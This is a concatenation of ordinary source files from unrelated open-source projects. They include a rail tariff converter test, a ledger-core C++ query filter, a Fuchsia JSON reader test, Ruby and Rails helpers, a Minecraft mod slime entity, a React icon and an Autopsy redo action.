package Gtm.converter.tests; import org.junit.Before; import org.junit.Test; import org.mockito.InjectMocks; import org.mockito.Mock; import org.mockito.Mockito; import org.mockito.MockitoAnnotations; import Gtm.ConnectionPoint; import Gtm.GTMTool; import Gtm.GtmFactory; import Gtm.Legacy108Station; import Gtm.LegacyCalculationType; import Gtm.LegacySeries; import Gtm.LegacySeriesType; import Gtm.RegionalConstraint; import Gtm.ViaStation; import Gtm.converter.ConverterFromLegacy; import Gtm.converter.ConverterToLegacy; import Gtm.converter.tests.dataFactories.LegacyDataFactory; import Gtm.converter.tests.mocks.MockedEditingDomain; import Gtm.converter.tests.mocks.MockedProgressMonitor; import Gtm.converter.tests.utils.TestUtils; import Gtm.utils.GtmUtils; public class TransitSeriesBorderPointTest { GTMTool tool = null; int borderPointCodeA = 10; int borderPointCodeG = 20; int legacyBorderStationCodeA = 1000; //A-Town (GR) int legacyBorderStationCodeG = 2000; //G-Town (GR) int legacyNonBorderStationCodeA = 1; //A-Town int legacyNonBorderStationCodeG = 7; //G-Town @Mock GtmUtils gtmUtilsMock; @InjectMocks ConverterFromLegacy converter2osdm; @InjectMocks ConverterToLegacy converter2legacy; @Before public void setUp() throws Exception { MockitoAnnotations.initMocks(this); tool = LegacyDataFactory.createBasicData(); //set legacy stations tool.getConversionFromLegacy().getLegacy108().setLegacyStations(GtmFactory.eINSTANCE.createLegacy108Stations()); Legacy108Station ls1 = GtmFactory.eINSTANCE.createLegacy108Station(); ls1 = LegacyDataFactory.createStation("A-Town","A-Town","A",legacyNonBorderStationCodeA,0,0); tool.getConversionFromLegacy().getLegacy108().getLegacyStations().getLegacyStations().add(ls1); Legacy108Station ls2 = GtmFactory.eINSTANCE.createLegacy108Station(); ls2 = LegacyDataFactory.createStation("A-Town (GR)","A-Town (GR)","A (GR)",legacyBorderStationCodeA,borderPointCodeA,0); tool.getConversionFromLegacy().getLegacy108().getLegacyStations().getLegacyStations().add(ls2); Legacy108Station ls3 = GtmFactory.eINSTANCE.createLegacy108Station(); ls3 = LegacyDataFactory.createStation("G-Town","G-Town","G",legacyNonBorderStationCodeG,0,0); tool.getConversionFromLegacy().getLegacy108().getLegacyStations().getLegacyStations().add(ls3); Legacy108Station ls4 = GtmFactory.eINSTANCE.createLegacy108Station(); ls4 = LegacyDataFactory.createStation("G-Town (GR)","G-Town (GR)","G (GR)",legacyBorderStationCodeG,borderPointCodeG,0); tool.getConversionFromLegacy().getLegacy108().getLegacyStations().getLegacyStations().add(ls4); LegacyDataFactory.addStation(tool, "A-TOWN", "10000",TestUtils.findCountry(tool,99)); LegacyDataFactory.addStation(tool, "G-TOWN", "20000",TestUtils.findCountry(tool,99)); //set border point 1 tool.getConversionFromLegacy().getLegacy108().setLegacyBorderPoints(GtmFactory.eINSTANCE.createLegacyBorderPoints()); LegacyDataFactory.addBorderPoint(tool,borderPointCodeA,"9999",99,legacyBorderStationCodeA,"00001","9995",98,10000,"10000"); //set border point 2 LegacyDataFactory.addBorderPoint(tool,borderPointCodeG,"9999",99,legacyBorderStationCodeG,"00007","9996",97,20000,"20000"); //series A-Town to A-Town (GR) tool.getConversionFromLegacy().getLegacy108().setLegacySeriesList(GtmFactory.eINSTANCE.createLegacySeriesList()); LegacySeries s = GtmFactory.eINSTANCE.createLegacySeries(); s.setCarrierCode("9999"); s.setDistance1(10); s.setDistance2(10); s.setFareTableNumber(1); s.setFromStation(legacyBorderStationCodeA); s.setToStation(legacyBorderStationCodeG); s.setNumber(1); s.setPricetype(LegacyCalculationType.ROUTE_BASED); s.setSupplyingCarrierCode("9999"); s.setType(LegacySeriesType.TRANSIT); s.setValidFrom(TestUtils.getFromDate()); s.setValidUntil(TestUtils.getUntilDate()); tool.getConversionFromLegacy().getLegacy108().getLegacySeriesList().getSeries().add(s); gtmUtilsMock = Mockito.mock(GtmUtils.class); converter2osdm = new ConverterFromLegacy(tool, new MockedEditingDomain(), null); //prepare codelists converter2osdm.initializeConverter(); //convert converter2osdm.convertToGtmTest(new MockedProgressMonitor()); } @Test public void testTransitNonMeritsBorderStationConversion() { //validate basics //one calendar assert(tool.getGeneralTariffModel().getFareStructure().getCalendars().getCalendars().size() == 1); //one regional constraint per series * 2 assert(tool.getGeneralTariffModel().getFareStructure().getRegionalConstraints().getRegionalConstraints().size() == tool.getConversionFromLegacy().getLegacy108().getLegacySeriesList().getSeries().size() * 2 //route and return route ); // number of fares = number of series * 2 * number of templates assert(tool.getGeneralTariffModel().getFareStructure().getFareElements().getFareElements().size() == tool.getConversionFromLegacy().getLegacy108().getLegacySeriesList().getSeries().size() * 2 // route and return route * tool.getConversionFromLegacy().getParams().getLegacyFareTemplates().getFareTemplates().size() ); // number of prices assert(tool.getGeneralTariffModel().getFareStructure().getPrices().getPrices().size() == 2); assert(tool.getGeneralTariffModel().getFareStructure().getConnectionPoints() != null); assert(tool.getGeneralTariffModel().getFareStructure().getConnectionPoints().getConnectionPoints().size() == 2); for (ConnectionPoint p : tool.getGeneralTariffModel().getFareStructure().getConnectionPoints().getConnectionPoints()) { assert(p.getConnectedStationSets().size() == 2); assert(p.getLegacyBorderPointCode() == borderPointCodeA || p.getLegacyBorderPointCode() == borderPointCodeG); } for (RegionalConstraint r : tool.getGeneralTariffModel().getFareStructure().getRegionalConstraints().getRegionalConstraints()) { if (!TestUtils.isReturnRoute(r)) { assert(r.getExitConnectionPoint().getLegacyBorderPointCode() == borderPointCodeG); assert(r.getEntryConnectionPoint().getLegacyBorderPointCode() == borderPointCodeA); ViaStation route = r.getRegionalValidity().get(0).getViaStation(); assert (route.getRoute().getStations().size() == 2); } else { assert(r.getExitConnectionPoint().getLegacyBorderPointCode() == borderPointCodeA); assert(r.getEntryConnectionPoint().getLegacyBorderPointCode() == borderPointCodeG); ViaStation route = r.getRegionalValidity().get(0).getViaStation(); assert (route.getRoute().getStations().size() == 2); } } //prepare for return conversion TestUtils.resetLegacy(tool); tool.getGeneralTariffModel().setDelivery(GtmFactory.eINSTANCE.createDelivery()); tool.getGeneralTariffModel().getDelivery().setProvider(TestUtils.findCarrier(tool, "9999")); converter2legacy = new ConverterToLegacy(tool, null, new MockedEditingDomain()); //convert converter2legacy.convertTest(new MockedProgressMonitor()); assert(tool.getConversionFromLegacy().getLegacy108().getLegacySeriesList() != null); assert(tool.getConversionFromLegacy().getLegacy108().getLegacySeriesList().getSeries() != null); assert(tool.getConversionFromLegacy().getLegacy108().getLegacySeriesList().getSeries().size() == 1); LegacySeries s = tool.getConversionFromLegacy().getLegacy108().getLegacySeriesList().getSeries().get(0); assert(s.getFromStation() == legacyBorderStationCodeA); assert(s.getToStation() == legacyBorderStationCodeG); assert(s.getType().equals(LegacySeriesType.TRANSIT)); Legacy108Station borderStation1 = TestUtils.findLegacyStation(tool,s.getFromStation()); Legacy108Station borderStation2 = TestUtils.findLegacyStation(tool,s.getToStation()); assert(borderStation1 != null); assert(borderStation1.getStationCode() == legacyBorderStationCodeA); assert(borderStation1.getBorderPointCode() == borderPointCodeA); assert(borderStation1.getName().equals("A-Town (GR)")); assert(borderStation2 != null); assert(borderStation2.getStationCode() == legacyBorderStationCodeG); assert(borderStation2.getBorderPointCode() == borderPointCodeG); assert(borderStation2.getName().equals("G-Town (GR)")); } }
villoro/villoro_posts
0005-strings_python/4_string_builtin_functions.py
<reponame>villoro/villoro_posts text = "heLLo world" print(text.upper()) print(text.lower()) print(text.title()) print("-" * 50) text = "\n hello\r\t" print(text.strip()) print(text.lstrip()) print(text.rstrip())
phaazon/lib-ledger-core
ledger-core/src/core/database/query/QueryFilter.cpp
/* * * QueryFilter * ledger-core * * Created by <NAME> on 28/06/2017. * * The MIT License (MIT) * * Copyright (c) 2016 Ledger * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in all * copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE * SOFTWARE. * */ #include <core/database/query/CompoundQueryFilter.hpp> #include <core/database/query/QueryFilter.hpp> #include <core/utils/Exception.hpp> namespace ledger { namespace core { std::shared_ptr<api::QueryFilter> QueryFilter::op_and(const std::shared_ptr<api::QueryFilter> &filter) { return link(filter, QueryFilterOperator::OP_AND); } std::shared_ptr<api::QueryFilter> QueryFilter::op_or(const std::shared_ptr<api::QueryFilter> &filter) { return link(filter, QueryFilterOperator::OP_OR); } std::shared_ptr<api::QueryFilter> QueryFilter::op_and_not(const std::shared_ptr<api::QueryFilter> &filter) { return link(filter, QueryFilterOperator::OP_AND_NOT); } std::shared_ptr<api::QueryFilter> QueryFilter::op_or_not(const std::shared_ptr<api::QueryFilter> &filter) { return link(filter, QueryFilterOperator::OP_OR_NOT); } int32_t QueryFilter::getSiblingsCount() const { auto count = 0; auto ptr = getHead(); while (ptr != nullptr) { ptr = ptr->_siblings.next; count += 1; } return count; } std::shared_ptr<api::QueryFilter> QueryFilter::link(const std::shared_ptr<api::QueryFilter> &filter, QueryFilterOperator op) { auto f = std::dynamic_pointer_cast<QueryFilter>(filter); std::shared_ptr<QueryFilter> newTail; if (!isTail()) { throw make_exception(api::ErrorCode::LINK_NON_TAIL_FILTER, "Cannot link already linked filter."); } if (f->getSiblingsCount() > 1) { // CREATE A COMPOUND FILTER newTail = std::make_shared<CompoundQueryFilter>(filter); } else { newTail = f; } _siblings.next = newTail; _siblings.op = op; newTail->_siblings.previous = shared_from_this(); return newTail; } bool QueryFilter::isTail() const { return _siblings.next == nullptr; } std::shared_ptr<QueryFilter> QueryFilter::getHead() const { auto ptr = std::const_pointer_cast<QueryFilter>(shared_from_this()); while (!ptr->isHead()) { ptr = ptr->_siblings.previous; } return ptr; } std::shared_ptr<QueryFilter> QueryFilter::getTail() const { auto ptr = std::const_pointer_cast<QueryFilter>(shared_from_this()); while (!ptr->isTail()) { ptr = ptr->_siblings.next; } return ptr; } bool QueryFilter::isHead() const { return _siblings.previous == nullptr; } std::shared_ptr<QueryFilter> QueryFilter::getNext() const { return std::const_pointer_cast<QueryFilter>(shared_from_this())->_siblings.next; } std::shared_ptr<QueryFilter> QueryFilter::getPrevious() const { return std::const_pointer_cast<QueryFilter>(shared_from_this())->_siblings.previous; } QueryFilterOperator QueryFilter::getOperatorForNextFilter() const { return std::const_pointer_cast<QueryFilter>(shared_from_this())->_siblings.op; } } }
opensource-assist/fuschia
garnet/bin/metric_broker/config/test/json_reader_test.cc
<reponame>opensource-assist/fuschia // Copyright 2019 The Fuchsia Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #include "garnet/bin/metric_broker/config/json_reader.h" #include <algorithm> #include <array> #include <cstdint> #include <fstream> #include <memory> #include <optional> #include <string> #include <string_view> #include "gmock/gmock.h" #include "gtest/gtest.h" #include "rapidjson/document.h" #include "rapidjson/istreamwrapper.h" #include "rapidjson/schema.h" #include "rapidjson/stringbuffer.h" namespace broker_service { namespace { constexpr std::string_view kSchemaPath = "pkg/data/testdata/fake.schema.json"; constexpr std::string_view kValidSchema = R"( { "required_field": false, "optional_field": false } )"; constexpr std::string_view kInvalidSchema = R"( { "optional_field": false, } )"; class JsonReaderTest : public ::testing::Test { public: static void SetUpTestSuite() { std::ifstream config_stream(kSchemaPath.data()); ASSERT_TRUE(config_stream.good()) << strerror(errno); rapidjson::IStreamWrapper config_wrapper(config_stream); rapidjson::Document schema_doc; ASSERT_FALSE(schema_doc.ParseStream(config_wrapper).HasParseError()); schema_doc_ = std::make_unique<rapidjson::SchemaDocument>(schema_doc); } static void TearDownTestSuite() { schema_doc_.reset(); } static rapidjson::SchemaDocument* GetSchema() { return schema_doc_.get(); } private: static std::unique_ptr<rapidjson::SchemaDocument> schema_doc_; }; std::unique_ptr<rapidjson::SchemaDocument> JsonReaderTest::schema_doc_ = nullptr; TEST_F(JsonReaderTest, IsOkIsTrueForSchemaCompilantJson) { rapidjson::Document config; config.Parse(kValidSchema.data(), kValidSchema.size()); JsonReader reader(std::move(config), GetSchema()); ASSERT_TRUE(reader.Validate()); ASSERT_TRUE(reader.IsOk()); ASSERT_TRUE(reader.error_messages().empty()); } TEST_F(JsonReaderTest, IsOkIsFalseForSchemaNonCompilantJson) { rapidjson::Document config; config.Parse(kInvalidSchema.data(), kInvalidSchema.size()); JsonReader reader(std::move(config), GetSchema()); ASSERT_FALSE(reader.Validate()); ASSERT_FALSE(reader.IsOk()); ASSERT_FALSE(reader.error_messages().empty()); } } // namespace } // namespace broker_service
matfurrier/BambooBSC
core-base/src/com/netsteadfast/greenstep/sys/SysEventLogSupport.java
<gh_stars>100-1000 /* * Copyright 2012-2016 bambooCORE, greenstep of copyright <NAME> * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * * ----------------------------------------------------------------------- * * author: <NAME> * contact: <EMAIL> * */ package com.netsteadfast.greenstep.sys; import java.util.Date; import java.util.HashMap; import java.util.Map; import org.apache.commons.lang3.StringUtils; import org.apache.log4j.Logger; import org.springframework.jdbc.core.namedparam.NamedParameterJdbcTemplate; import com.netsteadfast.greenstep.base.AppContext; import com.netsteadfast.greenstep.base.Constants; import com.netsteadfast.greenstep.util.SimpleUtils; public class SysEventLogSupport { protected static Logger log=Logger.getLogger(SysEventLogSupport.class); public static void log(String userId, String sysId, String executeEventId, boolean permit) { if ( StringUtils.isBlank(userId) || StringUtils.isBlank(sysId) || StringUtils.isBlank(executeEventId) ) { log.warn("null userId=" + userId + ", sysId=" + sysId + ", executeEventId=" + executeEventId); return; } if ( executeEventId.indexOf(Constants._COMMON_LOAD_FORM_ACTION) > -1 ) { log.warn("Common load form no need event log : " + executeEventId + " , permit = " + permit); return; } NamedParameterJdbcTemplate namedParameterJdbcTemplate = (NamedParameterJdbcTemplate)AppContext.getBean("namedParameterJdbcTemplate"); Map<String, Object> paramMap = new HashMap<String, Object>(); paramMap.put("oid", SimpleUtils.getUUIDStr()); paramMap.put("user", userId); paramMap.put("sysId", sysId); paramMap.put("executeEvent", ( executeEventId.length()>255 ? executeEventId.substring(0, 255) : executeEventId ) ); paramMap.put("isPermit", ( permit ? "Y" : "N" ) ); paramMap.put("cuserid", "SYS"); paramMap.put("cdate", new Date()); try { namedParameterJdbcTemplate.update("insert into tb_sys_event_log(OID, USER, SYS_ID, EXECUTE_EVENT, IS_PERMIT, CUSERID, CDATE) " + "values(:oid, :user, :sysId, :executeEvent, :isPermit, :cuserid, :cdate)", paramMap); } catch (Exception e) { e.printStackTrace(); log.error( e.getMessage().toString() ); } } }
klueless-io/k_dsl
_/.template/x-r6-app-core-bak/new-rails-32-l-helper.rb
# Log Helper is an internal class that takes care of a lot of the formating of different content types # e.g key/values, lines, progress counters and headings # it is different to the formatter becuase the formatter is used by Rails Logger to change the output stream style and format class LogHelper @progress_section = '' @progress_position = 0 class << self attr_accessor :progress_position attr_accessor :progress_section end def self.kv(key, value, key_width = 30) "#{key.ljust(key_width)}".green + ': ' + value.to_s end def self.progress(pos = nil, section = nil) if (pos.blank?) @progress_position = @progress_position else @progress_position = pos end if (!section.nil?) # Pl.info 'here' @progress_section = section end # puts '@progress_position' # puts @progress_position # puts '@progress_section' # puts @progress_section section_length = 28 if @progress_section.blank? section = ' ' * section_length else section = ' ' + @progress_section.ljust(section_length - 1, ' ') end # puts 'section' # puts section result = '..' + section + ':' + @progress_position.to_s.rjust(4) @progress_position = @progress_position + 1 return result end def self.line(size = 70, character = '=') result = character * size result.green end def self.heading(heading, size = 70) line = line(size) return [ line, heading, line ] end def self.subheading(heading, size = 70) line = line(size, '-') return [ line, heading, line ] end # A section heading # # example: # [ I am a heading ]---------------------------------------------------- def self.section_heading(heading, size = 70) heading = "[ #{heading} ]" line = line(size - heading.length, '-') # It is important that you set the colour after you have calculated the size return "#{heading.green}#{line}" end # :sql_array should be an array with SQL and values # example: L.sql(["name = :name and group_id = :value OR parent_id = :value", name: "foo'bar", value: 4]) def sql(sql_array) value = ActiveRecord::Base.send(:sanitize_sql_array, sql_array) info(value) end def self.block(messages, include_line=true, title: nil) result = include_line ? [line] : [] if title.present? result.push(title) result.push(line(70, ',')) end if (messages.is_a?(String) || messages.is_a?(Integer)) result.push(messages) end if (messages.kind_of? Array) messages.each do |message| result.push message end # result = result + messages end if include_line result.push(line) end return result end end
horta-tech/hera_cms
db/migrate/20201202150007_create_hera_cms_links.rb
<reponame>horta-tech/hera_cms class CreateHeraCmsLinks < ActiveRecord::Migration[6.0] def change create_table :hera_cms_links do |t| t.string :identifier t.string :path t.string :inner_text, default: "" t.string :classes, default: "" t.string :style, default: "" t.timestamps end end end
kmsiapps/maplestory_dpm_calc
dpmModule/character/characterTemplate.py
from .characterKernel import ItemedCharacter as ichar from .characterKernel import LinkSkill from ..item import Arcane, Absolab, Empress, RootAbyss, BossAccesory, Default, Else, Meister, Darkness from ..item.ItemKernel import CharacterModifier as MDF from ..item import ItemKernel as it _STORAGE_FOR_EXISTING_TEMPLATE_DEFINED_BY_ABSTRACT_TEMPLATE_GENERATOR = {} def register_template_generator(generator_class, generator_name): global _STORAGE_FOR_EXISTING_TEMPLATE_DEFINED_BY_ABSTRACT_TEMPLATE_GENERATOR _STORAGE_FOR_EXISTING_TEMPLATE_DEFINED_BY_ABSTRACT_TEMPLATE_GENERATOR[generator_name] = generator_class def get_template_generator(generator_name): global _STORAGE_FOR_EXISTING_TEMPLATE_DEFINED_BY_ABSTRACT_TEMPLATE_GENERATOR try: return _STORAGE_FOR_EXISTING_TEMPLATE_DEFINED_BY_ABSTRACT_TEMPLATE_GENERATOR[generator_name] except: raise KeyError(f'Given generator {generator_name} not exist or not had been registered.') class AbstractTemplateGenerator(): def __init__(self, weaponstat_config): self.WEAPONSTAT_CONFIG_RECOMMENDED = weaponstat_config def __iter__(self): for ulevel in self.get_ulevels(): yield ulevel, self.get_template(ulevel), self.WEAPONSTAT_CONFIG_RECOMMENDED[ulevel] def get_ulevels(self): return sorted(self.WEAPONSTAT_CONFIG_RECOMMENDED.keys()) def get_weaponstat(self, ulevel): return self.WEAPONSTAT_CONFIG_RECOMMENDED[ulevel] def query(self, ulevel): return self.get_template(ulevel), self.get_weaponstat(ulevel) def get_template(self, ulevel): raise NotImplementedError
Killarexe/Negative-N-Forge-Version
src/main/java/net/killarexe/negativen/entity/SlimeNEntity.java
<filename>src/main/java/net/killarexe/negativen/entity/SlimeNEntity.java package net.killarexe.negativen.entity; import net.minecraftforge.registries.ForgeRegistries; import net.minecraftforge.fml.network.NetworkHooks; import net.minecraftforge.fml.network.FMLPlayMessages; import net.minecraftforge.fml.javafmlmod.FMLJavaModLoadingContext; import net.minecraftforge.fml.event.lifecycle.FMLCommonSetupEvent; import net.minecraftforge.fml.client.registry.RenderingRegistry; import net.minecraftforge.fml.DeferredWorkQueue; import net.minecraftforge.eventbus.api.SubscribeEvent; import net.minecraftforge.event.world.BiomeLoadingEvent; import net.minecraftforge.common.MinecraftForge; import net.minecraftforge.client.event.ModelRegistryEvent; import net.minecraftforge.api.distmarker.OnlyIn; import net.minecraftforge.api.distmarker.Dist; import net.minecraft.world.gen.Heightmap; import net.minecraft.world.biome.MobSpawnInfo; import net.minecraft.world.World; import net.minecraft.util.math.BlockPos; import net.minecraft.util.ResourceLocation; import net.minecraft.util.DamageSource; import net.minecraft.network.IPacket; import net.minecraft.item.SpawnEggItem; import net.minecraft.item.ItemStack; import net.minecraft.item.Item; import net.minecraft.entity.monster.MonsterEntity; import net.minecraft.entity.ai.goal.SwimGoal; import net.minecraft.entity.ai.goal.RandomWalkingGoal; import net.minecraft.entity.ai.goal.MeleeAttackGoal; import net.minecraft.entity.ai.goal.LookRandomlyGoal; import net.minecraft.entity.ai.goal.HurtByTargetGoal; import net.minecraft.entity.ai.attributes.GlobalEntityTypeAttributes; import net.minecraft.entity.ai.attributes.Attributes; import net.minecraft.entity.ai.attributes.AttributeModifierMap; import net.minecraft.entity.MobEntity; import net.minecraft.entity.EntityType; import net.minecraft.entity.EntitySpawnPlacementRegistry; import net.minecraft.entity.EntityClassification; import net.minecraft.entity.Entity; import net.minecraft.entity.CreatureAttribute; import net.minecraft.client.renderer.model.ModelRenderer; import net.minecraft.client.renderer.entity.model.EntityModel; import net.minecraft.client.renderer.entity.MobRenderer; import net.minecraft.block.BlockState; import net.killarexe.negativen.itemgroup.NegativeNMobsItemGroup; import net.killarexe.negativen.item.SlimeBallNItem; import net.killarexe.negativen.NegativeNModElements; import com.mojang.blaze3d.vertex.IVertexBuilder; import com.mojang.blaze3d.matrix.MatrixStack; @NegativeNModElements.ModElement.Tag public class SlimeNEntity extends NegativeNModElements.ModElement { public static EntityType entity = null; public SlimeNEntity(NegativeNModElements instance) { super(instance, 61); FMLJavaModLoadingContext.get().getModEventBus().register(new ModelRegisterHandler()); MinecraftForge.EVENT_BUS.register(this); } @Override public void initElements() { entity = (EntityType.Builder.<CustomEntity>create(CustomEntity::new, EntityClassification.MONSTER).setShouldReceiveVelocityUpdates(true) .setTrackingRange(64).setUpdateInterval(3).setCustomClientFactory(CustomEntity::new).immuneToFire().size(1f, 1f)).build("slime_n") .setRegistryName("slime_n"); elements.entities.add(() -> entity); elements.items.add( () -> new SpawnEggItem(entity, -1, -1, new Item.Properties().group(NegativeNMobsItemGroup.tab)).setRegistryName("slime_n_spawn_egg")); } @SubscribeEvent public void addFeatureToBiomes(BiomeLoadingEvent event) { boolean biomeCriteria = false; if (new ResourceLocation("negative_n:desert_n").equals(event.getName())) biomeCriteria = true; if (!biomeCriteria) return; event.getSpawns().getSpawner(EntityClassification.MONSTER).add(new MobSpawnInfo.Spawners(entity, 10, 1, 1)); } @Override public void init(FMLCommonSetupEvent event) { DeferredWorkQueue.runLater(this::setupAttributes); EntitySpawnPlacementRegistry.register(entity, EntitySpawnPlacementRegistry.PlacementType.ON_GROUND, Heightmap.Type.MOTION_BLOCKING_NO_LEAVES, MonsterEntity::canMonsterSpawn); } private static class ModelRegisterHandler { @SubscribeEvent @OnlyIn(Dist.CLIENT) public void registerModels(ModelRegistryEvent event) { RenderingRegistry.registerEntityRenderingHandler(entity, renderManager -> { return new MobRenderer(renderManager, new Modelslime_n(), 0.5f) { @Override public ResourceLocation getEntityTexture(Entity entity) { return new ResourceLocation("negative_n:textures/slime_n.png"); } }; }); } } private void setupAttributes() { AttributeModifierMap.MutableAttribute ammma = MobEntity.func_233666_p_(); ammma = ammma.createMutableAttribute(Attributes.MOVEMENT_SPEED, 0.3); ammma = ammma.createMutableAttribute(Attributes.MAX_HEALTH, 15); ammma = ammma.createMutableAttribute(Attributes.ARMOR, 0); ammma = ammma.createMutableAttribute(Attributes.ATTACK_DAMAGE, 5); GlobalEntityTypeAttributes.put(entity, ammma.create()); } public static class CustomEntity extends MonsterEntity { public CustomEntity(FMLPlayMessages.SpawnEntity packet, World world) { this(entity, world); } public CustomEntity(EntityType<CustomEntity> type, World world) { super(type, world); experienceValue = 0; setNoAI(false); } @Override public IPacket<?> createSpawnPacket() { return NetworkHooks.getEntitySpawningPacket(this); } @Override protected void registerGoals() { super.registerGoals(); this.goalSelector.addGoal(1, new MeleeAttackGoal(this, 1.2, false)); this.goalSelector.addGoal(2, new RandomWalkingGoal(this, 1)); this.targetSelector.addGoal(3, new HurtByTargetGoal(this)); this.goalSelector.addGoal(4, new LookRandomlyGoal(this)); this.goalSelector.addGoal(5, new SwimGoal(this)); } @Override public CreatureAttribute getCreatureAttribute() { return CreatureAttribute.UNDEFINED; } protected void dropSpecialItems(DamageSource source, int looting, boolean recentlyHitIn) { super.dropSpecialItems(source, looting, recentlyHitIn); this.entityDropItem(new ItemStack(SlimeBallNItem.block, (int) (1))); } @Override public void playStepSound(BlockPos pos, BlockState blockIn) { this.playSound((net.minecraft.util.SoundEvent) ForgeRegistries.SOUND_EVENTS.getValue(new ResourceLocation("entity.slime.jump")), 0.15f, 1); } @Override public net.minecraft.util.SoundEvent getHurtSound(DamageSource ds) { return (net.minecraft.util.SoundEvent) ForgeRegistries.SOUND_EVENTS.getValue(new ResourceLocation("entity.slime.hurt")); } @Override public net.minecraft.util.SoundEvent getDeathSound() { return (net.minecraft.util.SoundEvent) ForgeRegistries.SOUND_EVENTS.getValue(new ResourceLocation("entity.slime.death")); } } // Made with Blockbench 3.7.4 // Exported for Minecraft version 1.15 // Paste this class into your mod and generate all required imports public static class Modelslime_n extends EntityModel<Entity> { private final ModelRenderer cube; private final ModelRenderer eye0; private final ModelRenderer eye1; private final ModelRenderer mouth; private final ModelRenderer cube2; public Modelslime_n() { textureWidth = 64; textureHeight = 32; cube = new ModelRenderer(this); cube.setRotationPoint(0.0F, 0.0F, 0.0F); cube.setTextureOffset(0, 0).addBox(-4.0F, 16.0F, -4.0F, 8.0F, 8.0F, 8.0F, 0.0F, true); eye0 = new ModelRenderer(this); eye0.setRotationPoint(0.0F, 0.0F, 0.0F); eye0.setTextureOffset(32, 0).addBox(1.3F, 18.0F, -3.5F, 2.0F, 2.0F, 2.0F, 0.0F, true); eye1 = new ModelRenderer(this); eye1.setRotationPoint(0.0F, 0.0F, 0.0F); eye1.setTextureOffset(32, 4).addBox(-3.3F, 18.0F, -3.5F, 2.0F, 2.0F, 2.0F, 0.0F, true); mouth = new ModelRenderer(this); mouth.setRotationPoint(0.0F, 0.0F, 0.0F); mouth.setTextureOffset(32, 8).addBox(-1.0F, 21.0F, -3.5F, 1.0F, 1.0F, 1.0F, 0.0F, true); cube2 = new ModelRenderer(this); cube2.setRotationPoint(0.0F, 0.0F, 0.0F); cube2.setTextureOffset(0, 16).addBox(-3.0F, 17.0F, -3.0F, 6.0F, 6.0F, 6.0F, 0.0F, true); } @Override public void render(MatrixStack matrixStack, IVertexBuilder buffer, int packedLight, int packedOverlay, float red, float green, float blue, float alpha) { cube.render(matrixStack, buffer, packedLight, packedOverlay); eye0.render(matrixStack, buffer, packedLight, packedOverlay); eye1.render(matrixStack, buffer, packedLight, packedOverlay); mouth.render(matrixStack, buffer, packedLight, packedOverlay); cube2.render(matrixStack, buffer, packedLight, packedOverlay); } public void setRotationAngle(ModelRenderer modelRenderer, float x, float y, float z) { modelRenderer.rotateAngleX = x; modelRenderer.rotateAngleY = y; modelRenderer.rotateAngleZ = z; } public void setRotationAngles(Entity e, float f, float f1, float f2, float f3, float f4) { } } }
jorgedc93/backpack
packages/bpk-svgs/dist/js/icons/sm/thumbs-down.js
import React from "react"; export default (({ styles = {}, ...props }) => <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18" style={{ width: "1.125rem", height: "1.125rem" }} {...props}><path d="M15.75 4v8.104a2.083 2.083 0 0 1-.144.762l-3.087 7.837a.458.458 0 0 1-.423.297 2.846 2.846 0 0 1-2.665-3.57l.284-1.188A.991.991 0 0 0 8.787 15H4.164a1.99 1.99 0 0 1-1.79-2.702l2.17-6.054A4.798 4.798 0 0 1 9.023 3h5.772a.979.979 0 0 1 .956 1zm2.55-1a1.05 1.05 0 0 0-1.05 1.05v6.9A1.05 1.05 0 0 0 18.3 12h2.4a1.05 1.05 0 0 0 1.05-1.05v-6.9A1.05 1.05 0 0 0 20.7 3z" /></svg>);
ljmf00/autopsy
ImageGallery/src/org/sleuthkit/autopsy/imagegallery/actions/RedoAction.java
/* * Autopsy Forensic Browser * * Copyright 2015 Basis Technology Corp. * Contact: carrier <at> sleuthkit <dot> org * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.sleuthkit.autopsy.imagegallery.actions; import javafx.scene.image.Image; import javafx.scene.image.ImageView; import javafx.scene.input.KeyCode; import javafx.scene.input.KeyCodeCombination; import org.controlsfx.control.action.Action; import org.openide.util.NbBundle; import org.sleuthkit.autopsy.imagegallery.ImageGalleryController; /** * Action that redoes the last undone command */ @NbBundle.Messages({"RedoAction.name=Redo"}) public class RedoAction extends Action { private static final Image REDO_IMAGE = new Image("/org/sleuthkit/autopsy/imagegallery/images/redo.png", 16, 16, true, true, true); //NON-NLS public RedoAction(ImageGalleryController controller) { super(Bundle.RedoAction_name()); setGraphic(new ImageView(REDO_IMAGE)); setAccelerator(new KeyCodeCombination(KeyCode.Y, KeyCodeCombination.CONTROL_DOWN)); setEventHandler(actionEvent -> controller.getUndoManager().redo()); disabledProperty().bind(controller.getUndoManager().redosAvailableProporty().lessThanOrEqualTo(0)); } }
JiangJibo/pinpoint
web/src/main/java/com/navercorp/pinpoint/web/dao/mysql/MysqlWebhookDao.java
